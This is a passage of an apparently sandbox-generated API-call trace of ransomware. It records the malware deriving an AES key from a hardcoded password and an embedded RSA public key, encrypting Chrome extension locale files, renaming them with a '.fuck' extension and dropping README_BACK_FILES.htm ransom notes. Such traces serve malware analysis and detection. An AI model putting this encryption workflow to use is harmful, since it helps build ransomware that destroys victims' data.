data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.488] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.489] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.490] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x29884a0) returned 1 [0250.492] CryptCreateHash (in: hProv=0x29884a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.492] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.492] CryptHashData (hHash=0x2985f60, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.492] CryptDeriveKey (in: hProv=0x29884a0, Algid=0x6610, hBaseData=0x2985f60, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985820) returned 1 [0250.492] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.492] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.492] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2989160) returned 1 [0250.493] CryptImportPublicKeyInfo (in: hCryptProv=0x2989160, dwCertEncodingType=0x1, pInfo=0x29352a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29352d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29352d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985860) returned 1 [0250.493] CryptEncrypt (in: hKey=0x2985860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.493] CryptEncrypt (in: hKey=0x2985860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2988d20*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2988d20*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.493] WriteFile (in: hFile=0x5d58, lpBuffer=0x2988d20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2988d20*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.495] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x119, lpOverlapped=0x0) returned 1 [0250.496] CryptEncrypt (in: hKey=0x2985820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x119, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0250.496] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0250.496] CloseHandle (hObject=0x5d5c) returned 1 [0250.497] CloseHandle (hObject=0x5d58) returned 1 [0250.497] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json"), bFailIfExists=0) returned 1 [0250.500] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json", dwFileAttributes=0x0) returned 1 [0250.501] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.gsg")) returned 1 [0250.502] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.fuck")) returned 1 [0250.503] CryptDestroyHash (hHash=0x2985f60) returned 1 [0250.503] CryptDestroyKey (hKey=0x2985820) returned 1 [0250.503] CryptReleaseContext (hProv=0x29884a0, dwFlags=0x0) returned 1 [0250.503] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.503] FindClose (in: hFindFile=0x2985d20 | out: hFindFile=0x2985d20) returned 1 [0250.503] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\readme_back_files.htm")) returned 0xffffffff [0250.504] AreFileApisANSI () returned 1 [0250.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e33b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.504] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.504] GetFileType (hFile=0x5d54) returned 0x1 [0250.504] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.506] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.506] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29858e0 [0250.507] FindNextFileA (in: hFindFile=0x29858e0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.507] FindNextFileA (in: hFindFile=0x29858e0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.507] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.507] GetLastError () returned 0x0 [0250.507] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json")) returned 0x20 [0250.507] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json", dwFileAttributes=0x80) returned 1 [0250.508] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.508] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.509] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.509] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2988b00) returned 1 [0250.512] CryptCreateHash (in: hProv=0x2988b00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.512] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.513] CryptHashData (hHash=0x2985960, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.513] CryptDeriveKey (in: hProv=0x2988b00, Algid=0x6610, hBaseData=0x2985960, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985f20) returned 1 [0250.513] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.513] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.513] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2988528) returned 1 [0250.513] CryptImportPublicKeyInfo (in: hCryptProv=0x2988528, dwCertEncodingType=0x1, pInfo=0x2933970*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29339a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29339a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985920) returned 1 [0250.513] CryptEncrypt (in: hKey=0x2985920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.513] CryptEncrypt (in: hKey=0x2985920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2988418*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2988418*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.514] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2988418*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2988418*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.515] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x11d, lpOverlapped=0x0) returned 1 [0250.516] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x11d, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0250.516] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0250.516] CloseHandle (hObject=0x5d58) returned 1 [0250.516] CloseHandle (hObject=0x5d5c) returned 1 [0250.516] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json"), bFailIfExists=0) returned 1 [0250.519] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json", dwFileAttributes=0x0) returned 1 [0250.519] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.gsg")) returned 1 [0250.521] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.fuck")) returned 1 [0250.539] CryptDestroyHash (hHash=0x2985960) returned 1 [0250.539] CryptDestroyKey (hKey=0x2985f20) returned 1 [0250.539] CryptReleaseContext (hProv=0x2988b00, dwFlags=0x0) returned 1 [0250.539] FindNextFileA (in: hFindFile=0x29858e0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.539] FindClose (in: hFindFile=0x29858e0 | out: hFindFile=0x29858e0) returned 1 [0250.539] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\readme_back_files.htm")) returned 0xffffffff [0250.539] AreFileApisANSI () returned 1 [0250.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.539] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.540] GetFileType (hFile=0x5d54) returned 0x1 [0250.540] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.541] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.541] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29858e0 [0250.541] FindNextFileA (in: hFindFile=0x29858e0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.541] FindNextFileA (in: hFindFile=0x29858e0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.542] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.542] GetLastError () returned 0x0 [0250.542] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json")) returned 0x20 [0250.543] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json", dwFileAttributes=0x80) returned 1 [0250.543] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.544] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.546] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.547] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2988da8) returned 1 [0250.550] CryptCreateHash (in: hProv=0x2988da8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.550] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.550] CryptHashData (hHash=0x2985ba0, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.550] CryptDeriveKey (in: hProv=0x2988da8, Algid=0x6610, hBaseData=0x2985ba0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985d20) returned 1 [0250.550] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.550] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.550] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29889f0) returned 1 [0250.551] CryptImportPublicKeyInfo (in: hCryptProv=0x29889f0, dwCertEncodingType=0x1, pInfo=0x2933a40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2933a70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2933a78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985e20) returned 1 [0250.551] CryptEncrypt (in: hKey=0x2985e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.551] CryptEncrypt (in: hKey=0x2985e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29888e0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x29888e0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.551] WriteFile (in: hFile=0x5d58, lpBuffer=0x29888e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x29888e0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.553] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, 